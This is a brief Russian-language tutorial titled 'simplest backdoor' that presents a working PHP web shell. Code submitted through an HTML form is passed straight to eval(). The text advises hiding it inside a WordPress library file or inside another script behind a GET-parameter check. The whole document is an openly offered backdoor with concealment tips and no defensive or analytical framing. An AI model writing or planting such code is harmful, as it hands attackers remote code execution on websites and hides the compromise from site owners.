Простейший backdoor

Данный код основан на встроенной функции eval(), которая выполняет строку как php-код. Можно вставить этот код куда-нибудь поглубже. Например, в какую-нибудь библиотеку, типа "/wp-includes/js/tinymce/help.php". Можно вставить этот код не в отдельный файл, а во внутрь какого-нибудь скрипта, только с условием типа if (isset($_GET['eval'])) ...

<?php
if (isset($_POST['code'])) {
    eval(
$_POST['code']);
}
?>

<form action="" method="post">
<textarea name="code"></textarea><br />
<input type="submit" value="Отправить" />
</form>